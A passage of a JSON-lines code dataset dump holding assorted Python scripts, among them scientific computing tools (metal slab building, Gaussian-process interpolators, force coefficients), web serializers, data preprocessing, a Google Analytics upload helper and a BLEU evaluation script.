else:\n datasets = [options.dataset]\n\n for d in datasets:\n ds = compute(d)\n if not options.latex:\n print(d, ' '.join(['%s = %.2s' % (k, v) for (k, v) in sorted(six.iteritems(ds))]))\n else:\n print('& '.join([d] + ['%.1f' % v for (k, v) in sorted(six.iteritems(ds))]))\n","sub_path":"bin/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"382916784","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom ase import Atoms\nimport ase.io \nfrom ase.build import molecule\nfrom ase.build import bulk \nfrom ase.build import surface\nfrom ase.build import add_vacuum \nfrom ase.build import fcc111, bcc110, hcp0001\nfrom ase.constraints import FixAtoms\nimport subprocess\n\n\n## Crystal structure of elements: from https://en.wikipedia.org/wiki/Periodic_table_(crystal_structure)\nbcc = ['V', 'Cr', 'Mn', 'Fe', 'Nb', 'Pb']\nhcp = ['Mg', 'Sc', 'Ti', 'Co', 'Zn', 'Y', 'Zr', 'Tc', 'Ru', 'Cd', 'Hf', 'Re', 'Os']\nfcc = ['Al', 'Ca', 'Ni', 'Cu', 'Rh', 'Pd', 'Ag', 'Ir', 'Pt', 'Au']\n\n### Metal Bulk structures from DFT calculations without vdw\n## {element:[E_bulk, Natom_in_the_bulk, lattice_a, lattice_c]\n## 'Bulks are conventional cells, not primitive cells'\n\ndict_metals = { \n'Ag':(-10.88004463,4,4.1423472817),\n'Co':(-14.06155869,2,2.4908062578,4.0275560997),\n'Cu':(-14.91182926,4,3.6339719976),\n'Fe':(-16.47105782,2,2.8346922247),\n'Ir':(-35.00402169,4,3.8852086642),\n'Ni':(-21.86901226,4,3.5177809803),\n'Pd':(-20.864555,4,3.9374172967),\n'Pt':(-24.39436715,4,3.9669414218),\n'Rh':(-29.10896058,4,3.8241655305),\n'Ru':(-18.49439863,2,2.7126893229,4.2897522328),\n}\n\n\ndef bottom(file_in):\n '''This function is used to pull the cetered atoms (from ASE) back to the bottom. '''\n f = open(file_in, 'r')\n lines = f.readlines()\n f.close()\n coord = [float(line.rstrip().split()[2]) for line in lines[9:]]\n bottom = min(coord)\n out_put = open(file_in + '_bottomed', 'w')\n out_put.writelines(i for i in lines[0:9])\n for line in lines[9:]:\n infor = line.rstrip().split()\n infor[2] = str(float(infor[2]) - bottom)\n out_put.write(' '.join(infor) + '\\n')\n out_put.close() \n\n\ndef cssm(metal, data_dict): # cleave_stable_surfaces_from_metals \n name = 'POSCAR_' + metal\n if metal in bcc: # For bcc metals, cleave 110 surface \n lattice_a = float(data_dict.get(metal)[2])\n for i in range(1, 4):\n name_out = name + '_' + str(i)\n slab = bcc110(metal, a=lattice_a, size=(i, i, 4), vacuum = 7.5)\n '''(i,i,4) means repeat i i 4 in x y and z directions. vacuum will be 7.5 * 2 because it was added on the two sides.''' \n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n ### Add the element line to the POSCAR file ###\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True)\n bottom(name_out) \n elif metal in hcp: # For hcp metals, cleave 0001 surface \n lattice_a, lattice_c = [float(i) for i in data_dict.get(metal)[2:]]\n for i in range(1,4):\n name_out = name + '_' + str(i)\n slab = hcp0001(metal, a = lattice_a, c = lattice_c, size = (i, i, 4), vacuum = 7.5)\n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True )\n bottom(name_out) \n \n elif metal in fcc: # For fcc metals, cleave 111 surface\n lattice_a = float(data_dict.get(metal)[2])\n for i in range(1,4):\n name_out = name + '_' + str(i)\n slab = fcc111(metal, a = lattice_a, size = (i, i, 4), vacuum = 7.5)\n# slab.center(vacuum=7.5, axis = 2)\n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True )\n bottom(name_out) \n else: \n print('Please add your element in the crystal structure lists: bcc, hcp, and fcc') \n\n\nfor metal in dict_metals.keys():\n cssm(metal, dict_metals)","sub_path":"cssm.py","file_name":"cssm.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598790851","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='Dump the output of `brew list` to an SQL database.')\nparser.add_argument('action', choices=['dump', 'ls'])\n\nargs = parser.parse_args()\n\nif args.action == 'dump':\n subprocess.run(['bash', '-c', '''su - user -c \"psql -c 'DELETE FROM schema_.packages;'\"'''], check=True)\n subprocess.run(['bash', '-c', r\"\"\"brew list -1 --versions | awk '{ print \"INSERT INTO schema_.packages VALUES ('\\\\\\''\"$1\"'\\\\\\'', '\\\\\\''\"$2\"'\\\\\\'');\" }' | xargs -I % su - user -c 'psql -c \"%\"'\"\"\"], check=True)\nelif args.action == 'ls':\n subprocess.run(['bash', '-c', '''su - user -c \"psql -c 'SELECT * from schema_.packages;'\"'''], check=True)","sub_path":"Packages/dumper/dumper.py","file_name":"dumper.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32875126","text":"from application import db\nfrom application.models import Base\nfrom sqlalchemy.sql import text\n\nclass Product(Base):\n\n name = db.Column(db.String(144), nullable=False)\n producer = db.Column(db.String(144), nullable=False)\n public = db.Column(db.Boolean, nullable=False)\n\n account_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)\n\n def __init__(self, name, producer):\n self.name = name\n self.producer = producer\n self.public = False\n\n @staticmethod\n def remove_product(id):\n print(\"poistetaan: \" + id)\n stmt = text(\"DELETE FROM product WHERE (Product.id = :id)\").params(id=id)\n db.engine.execute(stmt)","sub_path":"application/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493566102","text":"\"\"\"Reads and saves csv data to json in organized format\n\"\"\"\nimport json\nimport os\nfrom decimal import Decimal\n\n\ndef get_disease_data(details):\n \"\"\"returns only necessary disease data\n\n Arguments:\n details {list} -- details of each county\n \"\"\"\n return {\n \"state_name\": details[0].upper(),\n \"name\": details[1].upper(),\n \"death_rates\": float(Decimal(details[3]))\n }\n\n\ndef get_census_data(details):\n \"\"\"returns only required data from census\n\n Arguments:\n details {list} -- details of each county\n \"\"\"\n try:\n return {\n \"state_name\": details[5].split('-')[1].strip().upper(),\n \"name\": details[6].upper().replace(' COUNTY', ''),\n \"population\": int(details[7].split('(')[0]),\n \"area\": float(Decimal(details[9].split('(')[0])),\n }\n except IndexError:\n return None\n\n\ndef get_state_data(details):\n \"\"\"returns bordering states for a state\n\n Arguments:\n details {list} -- details of each state\n \"\"\"\n return {\"name\": details[0].upper(), \"bordering_states\": details[1:-1]}\n\n\ndef aggregate_county_data(county, census_data):\n \"\"\"aggregates county data for given county\n\n Arguments:\n county {string}\n census_data {list}\n \"\"\"\n for item in census_data:\n if county[\"name\"] in item[\"name\"] and item[\"state_name\"] == county[\"state_name\"]:\n county.update(item)\n return county\n\n\ndef get_county_data_by_state(state, disease_data, census_data):\n \"\"\"gets county data for given state\n\n Arguments:\n state {[type]} -- [description]\n disease_data {[type]} -- [description]\n census_data {[type]} -- [description]\n \"\"\"\n return [\n aggregate_county_data(county, census_data) for county in disease_data\n if county[\"state_name\"] == state[\"name\"]\n ]\n\n\ndef aggregate(disease_data, census_data, state_data):\n \"\"\"aggregates all county data\n\n Arguments:\n disease_data {list}\n census_data {list}\n state_data {list}\n \"\"\"\n return {\n state[\"name\"]: {\n \"Counties\":\n get_county_data_by_state(state, disease_data, census_data),\n \"Bordering States\":\n state[\"bordering_states\"]\n }\n for state in state_data\n }\n\n\ndef main():\n \"\"\"Organizes data into /outputs\n \"\"\"\n disease_data_fp = os.path.join(\"data\", \"usa_heartrate_by_county.csv\")\n census_data_fp = os.path.join(\"data\", \"usa_population_area_by_county.csv\")\n state_data_fp = os.path.join(\"data\", \"usa_bordering_states.csv\")\n output_fp = os.path.join(\"output\", \"organized_data.json\")\n\n with open(disease_data_fp, \"r\") as fobj:\n disease_data = [\n get_disease_data(i.strip().split(',')) for i in fobj.readlines()\n ]\n with open(census_data_fp, \"r\") as fobj:\n census_data = [\n get_census_data(i.strip().split(',')) for i in fobj.readlines()\n if get_census_data(i.strip().split(',')) is not None\n ]\n with open(state_data_fp) as fobj:\n state_data = [\n get_state_data(i.strip().split(',')) for i in fobj.readlines()\n ]\n json.dump(\n aggregate(disease_data, census_data, state_data), open(output_fp, \"w\"))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/preprocessing/organize_data.py","file_name":"organize_data.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"238110826","text":"#! /usr/bin/env python3\n\nimport numpy as np\nimport argparse\nimport os\nimport sys\nimport json\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel, ConstantKernel as C\nfrom scipy.linalg import cholesky, cho_solve\n\nparser = argparse.ArgumentParser(description=\"Evaluate a single interpolator, specified by `--interp-angle` and `--interp-time`, on the parameters given in `--parameter-file`\")\nparser.add_argument(\"--interp-angle\", help=\"Which angle (of 0, 30, 45, 60, 75, 90) to evaluate\")\nparser.add_argument(\"--interp-time\", help=\"Which time (of the set values at which the interpolators are trained) to use\")\nparser.add_argument(\"--grid-file\", help=\"Filename for the parameter grid\")\nparser.add_argument(\"--index-file\", help=\"Name of file containing the indices in the grid that correspond to `--interp-angle`\")\nparser.add_argument(\"--output-directory\", help=\"File to write magnitudes to\")\nparser.add_argument(\"--band\", help=\"Band to evaluate\")\nparser.add_argument(\"--n-samples-per-eval\", type=int, default=10000, help=\"Number of points to evaluate in a given interpolator call (prevents the GPR from using too much memory at once)\")\nargs = parser.parse_args()\n\n# In general this will already have been made by partition_grid.py, but it doesn't hurt to check\nif not os.path.exists(args.output_directory):\n os.makedirs(args.output_directory)\n\n# wavelengths corresponding to bands\nwavelengths = {\n \"g\":477.56,\n \"r\":612.95,\n \"i\":748.46,\n \"z\":865.78,\n \"y\":960.31,\n \"J\":1235.0,\n \"H\":1662.0,\n \"K\":2159.0\n}\n\n# _load_gp() and _model_predict() are stolen from Marko's code\ndef _load_gp(fname_base):\n kernel=None\n with open(fname_base + \".json\",'r') as f:\n my_json = json.load(f)\n my_X = np.loadtxt(fname_base + \"_X.dat\")\n my_y = np.loadtxt(fname_base + \"_y.dat\")\n my_alpha = np.loadtxt(fname_base + \"_alpha.dat\")\n dict_params = my_json['kernel_params']\n theta = np.array(my_json['kernel']).astype('float')\n theta = np.power(np.e, theta)\n kernel = WhiteKernel(theta[0]) + theta[1]*RBF(length_scale=theta[2:])\n gp = GaussianProcessRegressor(kernel=kernel,n_restarts_optimizer=0)\n gp.kernel_ = kernel\n dict_params_eval = {}\n for name in dict_params:\n if not('length' in name or 'constant' in name):\n continue\n if name ==\"k2__k2__length_scale\":\n one_space = ' '.join(dict_params[name].split())\n dict_params_eval[name] = eval(one_space.replace(' ',','))\n else:\n dict_params_eval[name] = eval(dict_params[name])\n gp.kernel_.set_params(**dict_params_eval)\n gp.X_train_ = my_X\n gp.y_train_ = my_y\n gp.alpha_ = my_alpha\n gp._y_train_std = float(my_json['y_train_std'])\n gp._y_train_mean = float(my_json['y_train_mean'])\n return gp\n\ndef _model_predict(model, inputs):\n K = model.kernel_(model.X_train_)\n K[np.diag_indices_from(K)] += model.alpha\n model.L_ = cholesky(K, lower=True) # recalculating L matrix since this is what makes the pickled models bulky\n model._K_inv = None # has to be set to None so the GP knows to re-calculate matrices used for uncertainty\n K_trans = model.kernel_(inputs, model.X_train_)\n pred = K_trans.dot(model.alpha_)\n pred = model._y_train_std * pred + model._y_train_mean\n v = cho_solve((model.L_, True), K_trans.T)\n y_cov = model.kernel_(inputs) - K_trans.dot(v)\n err = np.sqrt(np.diag(y_cov))\n \n mags = _log_lums_to_mags(pred)\n mags_error = 2.5 * err\n\n return mags, mags_error\n\ndef _log_lums_to_mags(log_lums):\n d = 3.086e18 # parsec in cm\n d *= 10 # distance of 10 pc\n log_flux = log_lums - np.log10(4.0 * np.pi * d**2)\n mags = -48.6 - 2.5 * log_flux\n return mags\n\n# load the grid\ngrid = np.atleast_2d(np.loadtxt(args.grid_file))\nparams = np.empty((grid.shape[0], 5))\nparams[:,:4] = grid[:,3:7] # take everything but angle\nparams[:,4] = wavelengths[args.band]\n\n# load the grid indices if they exist, exiting if it has size 0\nif args.index_file is None: # if there is no index file, assume we're evaluating the interpolator at every index\n indices = np.arange(grid.shape[0]).astype(int)\nelse:\n indices = np.loadtxt(args.index_file).astype(int)\nif indices.size == 0:\n exit()\n\nparams = params[indices]\n\n# location of trained interpolators\ninterp_loc = os.environ[\"INTERP_LOC\"]\nif interp_loc[-1] != \"/\":\n interp_loc += \"/\"\ninterp_loc += \"surrogate_data/2021_Wollaeger_TorusPeanut/\"\n\n# load the interpolator\ninterp_name = interp_loc + \"theta\" + (\"00\" if args.interp_angle == \"0\" else args.interp_angle) + \"deg/t_\" + args.interp_time + \"_days/model\"\nmodel = _load_gp(interp_name)\n\n# break the evaluation into smaller pieces to avoid using too much RAM\nif params.shape[0] > args.n_samples_per_eval:\n params_chunk_list = np.array_split(params, int(params.shape[0] / args.n_samples_per_eval))\nelse:\n params_chunk_list = [params]\n\nmags_full = np.empty(0)\nmags_err_full = np.empty(0)\n\nfor chunk in params_chunk_list:\n if chunk.size == 0:\n continue\n # evaluate the interpolator\n mags, mags_err = _model_predict(model, chunk)\n mags_full = np.append(mags_full, mags)\n mags_err_full = np.append(mags_err_full, mags_err)\n\n# fill an array with the results\noutput_array = np.empty((params.shape[0], 2))\noutput_array[:,0] = mags_full\noutput_array[:,1] = mags_err_full\n\n# write the output to a file\nnp.savetxt(args.output_directory + (\"/\" if args.output_directory[-1] != \"/\" else \"\") + \"eval_interp_{0}_{1}_{2}.dat\".format(args.interp_time, args.interp_angle, args.band), output_array)\n","sub_path":"bin/evaluate_interpolator.py","file_name":"evaluate_interpolator.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533762276","text":"# -*- coding: utf-8 -*-\nimport os\nimport numpy as np\nimport cv2\nimport shutil\nimport sys\n\n\ndebug = False\n\n\nclass ImageDate():\n def __init__(self, line, img_dir):\n line = line.strip().split()\n \"\"\"\n label(147) = [136(68*2) points] + [4 bbox] + [6 attributes] + saveName\n \"\"\"\n if len(line) != 147:\n import pdb\n pdb.set_trace()\n self.list = line\n self.landmark = np.asarray(\n list(map(float, line[:136])), dtype=np.float32).reshape(-1, 2)\n self.landmark_lip = self.landmark[48:]\n # print(\"lip land num: \", len(self.landmark_lip))\n self.box = np.asarray(list(map(int, line[136:140])), dtype=np.int32)\n self.flag = list(map(int, line[140:146]))\n if img_dir == \"none\":\n self.path = line[-1]\n else:\n self.path = os.path.join(img_dir, line[-1])\n self.img = None\n self.new_box = []\n\n def extract_lip(self):\n # ========画像を顔枠ら辺でcropし、輪郭点を調査========\n # crop枠のサイズ\n xy = np.min(self.landmark_lip, axis=0).astype(np.int32)\n zz = np.max(self.landmark_lip, axis=0).astype(np.int32)\n wh = zz - xy + 1\n center = (xy + wh / 2).astype(np.int32)\n boxsize = int(np.max(wh) * 1.2)\n # crop枠の左上を原点とした中心までの座標\n xy = center - boxsize // 2\n x1, y1 = xy\n x2, y2 = xy + boxsize\n try:\n img = cv2.imread(self.path)\n height, width, _ = img.shape\n except Exception as e:\n import pdb\n pdb.set_trace()\n # crop枠の左上 or 画像の左上縁\n dx = max(0, -x1)\n dy = max(0, -y1)\n x1 = max(0, x1)\n y1 = max(0, y1)\n xy = (x1, y1)\n\n # crop枠の右下 or 画像の右下縁\n edx = max(0, x2 - width)\n edy = max(0, y2 - height)\n x2 = min(width, x2)\n y2 = min(height, y2)\n\n self.new_box = [x1, y1, x2, y2]\n\n if debug:\n # 表示して確認\n img_tmp = img.copy()\n cv2.rectangle(img, (self.new_box[0], self.new_box[1]),\n (self.new_box[2], self.new_box[3]), (255, 0, 0), 1, 1)\n for x, y in (self.landmark_lip + 0.5).astype(np.int32):\n cv2.circle(img_tmp, (x, y), 1, (255, 0, 0))\n cv2.imwrite(\"./sample_lip.jpg\", img_tmp)\n # import pdb;pdb.set_trace()\n\n def save_data(self):\n # attributeは特にいじらず保存\n attributes = self.flag\n attributes = np.asarray(attributes, dtype=np.int32)\n attributes_str = ' '.join(list(map(str, attributes)))\n\n bb_str = ' '.join(list(map(str, self.new_box)))\n self.landmark_lip = self.landmark_lip.astype(np.int32)\n landmark_lip_str = ' '.join(\n list(map(str, self.landmark_lip.reshape(-1).tolist())))\n\n label = '{} {} {} {}\\n'.format(\n landmark_lip_str, bb_str, attributes_str, self.path)\n\n label_line = label.strip().split()\n if debug:\n print(len(label_line))\n print(label)\n if len(label_line) != 51:\n import pdb\n pdb.set_trace()\n\n return label\n\n\nif __name__ == '__main__':\n # change bb and landmark to around lip bb and lip landmark only of base txt label.\n # bedore : label(147) = [136(68*2) points] + [4 bbox] + [6 attributes] + saveName\n # after : label(51) = [40(20*2) points] + [4 bbox] + [6 attributes] + saveName\n if len(sys.argv) == 4:\n base_txt = sys.argv[1]\n # none or img dir path\n # if your label txt include img dir, set none\n img_dir = sys.argv[2]\n save_txt = sys.argv[3]\n else:\n print(\"please set arg(base_txt imgdir save_txt)\")\n exit()\n\n with open(base_txt, 'r') as f:\n lines = f.readlines()\n labels = []\n\n if debug:\n lines = lines[:100]\n print(\"get file num: \", len(lines))\n for i, line in enumerate(lines):\n Img = ImageDate(line, img_dir)\n Img.extract_lip()\n label_txt = Img.save_data()\n labels.append(label_txt)\n if ((i + 1) % 100) == 0:\n print('file: {}/{}'.format(i + 1, len(lines)))\n\n with open(save_txt, 'w') as f:\n for label in labels:\n f.writelines(label)\n\n print(\"processed image num: \", len(labels))\n print('end')\n","sub_path":"data/extract_lip_label.py","file_name":"extract_lip_label.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"273619447","text":"from rest_framework import serializers\nfrom django.db.models import Prefetch\nfrom publish import models\nfrom product.serializers import ProductSerializer\n\n# TODO Need to 최적화 (Nested Serializer)\n\n\nclass LinkingBannerSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.LinkingBanner\n fields = ('ordering', 'title', 'list_thumb_picture',\n 'cover_picture_1',\n 'cover_picture_2',\n 'cover_picture_3',\n 'cover_picture_4',\n 'link_url',\n 'coupon_code',\n 'banner_type',\n 'primary_color',\n 'secondary_color', 'data')\n\n\nclass ProductGroupInLineSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.ProductGroup\n fields = ('ordering', 'title',\n 'cover_picture', 'list_thumb_picture',\n 'pk')\n\n\nclass ProductGroupSerializer(serializers.ModelSerializer):\n product_list = ProductSerializer(many=True)\n\n class Meta:\n model = models.ProductGroup\n fields = ('product_list',)\n\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'product_list__category',\n 'product_list__shopee_rating',\n 'product_list__style',\n 'product_list__sub_category',\n 'product_list__store',\n 'product_list__store__age',\n 'product_list__store__primary_style',\n 'product_list__store__secondary_style',\n 'product_list__post__post_image_set',\n 'product_list__color',\n 'product_list__size',\n 'product_list__extra_option',\n 'product_list__favorite_users',\n 'product_list__store__favorite_users',\n 'product_list__store__category',\n 'product_list__product_image_set',\n 'product_list__store__product_category',\n 'product_list__product_options',\n 'product_list__product_options__size',\n 'product_list__product_options__color',\n )\n return queryset\n\n\nclass ProductTagGroupSerializer(serializers.ModelSerializer):\n category = serializers.StringRelatedField(many=False)\n sub_category = serializers.StringRelatedField(many=False)\n color = serializers.StringRelatedField(many=False)\n style = serializers.StringRelatedField(many=False)\n store = serializers.StringRelatedField(many=False)\n pattern = serializers.StringRelatedField(many=False)\n\n class Meta:\n model = models.ProductTagGroup\n fields = ('__str__', 'category', 'sub_category',\n 'color', 'style', 'store', 'pattern')\n\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'store',\n 'category',\n 'sub_category',\n 'color',\n 'style',\n 'pattern',\n )\n\n return queryset\n\n\nclass MainPagePublishSerializer(serializers.ModelSerializer):\n producttaggroup_set = ProductTagGroupSerializer(many=True)\n\n class Meta:\n model = models.MainPagePublish\n fields = ('producttaggroup_set',)\n\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'producttaggroup_set',\n 'producttaggroup_set__store',\n 'producttaggroup_set__category',\n 'producttaggroup_set__sub_category',\n 'producttaggroup_set__color',\n 'producttaggroup_set__style',\n )\n\n return queryset\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n\n\nclass BannerPublishSerializer(serializers.ModelSerializer):\n productgroup_set = ProductGroupInLineSerializer(read_only=True, many=True)\n linkingbanner_set = LinkingBannerSerializer(read_only=True, many=True)\n\n class Meta:\n model = models.BannerPublish\n fields = ('date', 'productgroup_set', 'linkingbanner_set')\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n # queryset = queryset.prefetch_related(Prefetch(\n # 'postgroup_set',\n # queryset=models.ProductGroup.objects.order_by('ordering')))\n # queryset = queryset.prefetch_related(\n # 'postgroup_set__post_list',\n # 'postgroup_set__post_list__post_image_set',\n # 'postgroup_set__post_list__store',\n # 'postgroup_set__post_list__store__category',\n # 'postgroup_set__post_list__store__primary_style',\n # 'postgroup_set__post_list__store__secondary_style',\n # 'postgroup_set__post_list__store__age',\n # )\n return queryset\n\n\nclass MagazinePublishSerializer(serializers.ModelSerializer):\n postgroup_set = ProductGroupInLineSerializer(read_only=True, many=True)\n\n class Meta:\n model = models.MagazinePublish\n fields = ('date', 'postgroup_set',)\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(Prefetch(\n 'postgroup_set',\n queryset=models.ProductGroup.objects.order_by('ordering')))\n queryset = queryset.prefetch_related(\n 'postgroup_set__post_list',\n 'postgroup_set__post_list__post_image_set',\n 'postgroup_set__post_list__store',\n 'postgroup_set__post_list__store__category',\n 'postgroup_set__post_list__store__primary_style',\n 'postgroup_set__post_list__store__secondary_style',\n 'postgroup_set__post_list__store__age',\n )\n\n return queryset\n","sub_path":"app/publish/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"532341332","text":"\"\"\"Plot the history of the force coefficients.\"\"\"\n\nimport math\nfrom matplotlib import pyplot\nimport numpy\nimport pathlib\n\nimport petibmpy\n\nimport rodney\n\n\nargs = rodney.parse_command_line()\n\n# Load forces from file.\nsimudir = pathlib.Path(__file__).absolute().parents[1]\ndatadir = simudir / 'output'\nfilepath = datadir / 'forces-0.txt'\nt, fx, fy = petibmpy.read_forces(filepath)\n\n# Convert forces to force coefficients.\nrho, U_inf, D = 1.0, 1.0, 1.0\ncoeff = 1 / (0.5 * rho * U_inf**2 * D)\ncd, cl = petibmpy.get_force_coefficients(fx, fy, coeff=coeff)\n\nprint(f'Final value of the drag coefficient: CD = {cd[-1]:.4f}')\ntime_limits = (40.0, 50.0)\ncd_, = petibmpy.get_time_averaged_values(t, cd, limits=time_limits)\nprint(f'Time-averaged {time_limits} drag coefficient: = {cd_:.4f}')\n\n# Plot the history of the force coefficients.\npyplot.rc('font', family='serif', size=14)\nfig, ax = pyplot.subplots(figsize=(8.0, 4.0))\nax.set_xlabel('Non-dimensional time')\nax.set_ylabel('Force coefficients')\nax.plot(t, cd, label='$C_D$', color='black', linestyle='-')\nax.plot(t, cl, label='$C_L$', color='black', linestyle='--')\nax.legend(frameon=False)\nax.set_xlim(t[0], t[-1])\nax.set_ylim(-3.0, 3.0)\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nfig.tight_layout()\n\nif args.save_figures:\n # Save the figure.\n figdir = simudir / 'figures'\n figdir.mkdir(parents=True, exist_ok=True)\n filepath = figdir / 'force_coefficients.png'\n fig.savefig(filepath, dpi=300, bbox_inches='tight')\n\nif args.show_figures:\n pyplot.show()\n","sub_path":"runs/cylinder2dRe40/500_markers/scripts/plot_force_coefficients.py","file_name":"plot_force_coefficients.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"106062442","text":"from apiclient.http import MediaFileUpload\nimport time\nfrom apiclient.discovery import build\nfrom google.oauth2 import service_account\n\n\nclass GAnalyticsUpload:\n def __init__(self, path_to_json, account_id, web_property_id, custom_data_source_id):\n self.KEY_FILE_LOCATION = path_to_json\n self.SCOPES = [\"https://www.googleapis.com/auth/analytics\"]\n self.account_id = account_id\n self.web_property_id = web_property_id\n self.custom_data_source_id = custom_data_source_id\n self.credentials = service_account.Credentials.from_service_account_file(path_to_json)\n self.scoped_credentials = self.credentials.with_scopes(self.SCOPES)\n self.analytics = build('analytics', 'v3', credentials=self.scoped_credentials)\n \n def upload_data(self, data_frame, path_to_csv, file_name):\n \"\"\"\n ga:date - дата\n ga:medium - канал\n ga:source - источник\n ga:adClicks - клики\n ga:adCost - стоимость\n ga:impressions - показы\n ga:adContent - содержание объявления\n ga:campaign - кампания\n ga:keyword - ключевое слово\n \n \"\"\"\n data_frame.to_csv(path_to_csv+file_name, decimal=\".\", index=False)\n media = MediaFileUpload(path_to_csv+file_name, mimetype='application/octet-stream', resumable=False)\n daily_upload = self.analytics.management().uploads().uploadData(accountId=self.account_id,\n webPropertyId=self.web_property_id,\n customDataSourceId=self.custom_data_source_id,\n media_body=media).execute()\n daily_upload_id = daily_upload['id']\n status, message = self.check_upload_status(daily_upload_id)\n return status, message\n \n def check_upload_status(self, daily_upload_id):\n uploads = self.analytics.management().uploads().list(accountId=self.account_id,\n webPropertyId=self.web_property_id,\n customDataSourceId=self.custom_data_source_id).execute()\n for upload in uploads['items']:\n if upload['id'] == daily_upload_id:\n status = upload['status']\n if status == 'FAILED':\n return status, upload['errors']\n elif status in ['PENDING', 'DELETING']:\n time.sleep(5)\n return self.check_upload_status(daily_upload_id)\n else:\n return status, \"success\"\n\n","sub_path":"analytics/connectors/_GAnalyticsUpload.py","file_name":"_GAnalyticsUpload.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334424112","text":"from evalAlign import _get_BLEU_scores, _get_bp\nfrom preprocess import preprocess\nimport argparse\n\ndef main(args):\n with open('bonus3_nmt_translations.txt') as f1, open('/u/cs401/A2_SMT/data/Hansard/Testing/Task5.e') as f2, open('/u/cs401/A2_SMT/data/Hansard/Testing/Task5.google.e') as f3:\n eng_decoded = [preprocess(sent, 'e') for sent in f1.read().splitlines()]\n eng = [preprocess(sent, 'e') for sent in f2.read().splitlines()]\n google_refs = [preprocess(sent, 'e') for sent in f3.read().splitlines()]\n\n f = open(\"bonus3_Task5.txt\", 'w+')\n f.write(\"-\" * 10 + \"Evaluation START\" + \"-\" * 10 + \"\\n\")\n\n all_evals = []\n bps = [_get_bp(cand, [hansard_ref, google_ref]) for cand, hansard_ref, google_ref in zip(eng_decoded, eng, google_refs)]\n\n for n in range(1, 4):\n f.write(f\"\\nBLEU scores with N-gram (n) = {n}: \")\n if n == 1:\n evals = [bp*pn for (pn, bp) in zip(_get_BLEU_scores(eng_decoded, eng, google_refs, n), bps)]\n else:\n evals = [bp*(pn*(prevpn/bp)**(n-1))**(1/n) for (pn, bp, prevpn) in zip(_get_BLEU_scores(eng_decoded, eng, google_refs, n), bps, all_evals[-1])]\n for v in evals:\n f.write(f\"\\t{v:1.4f}\")\n\n f.write(f\"\\nMean of BLEU scores:\\t{sum(evals)/len(evals):1.4f}\")\n all_evals.append(evals)\n\n f.write(\"\\n\\n\")\n\n f.write(\"-\" * 10 + \"Evaluation END\" + \"-\" * 10 + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Use parser for debugging if needed\")\n args = parser.parse_args()\n\n 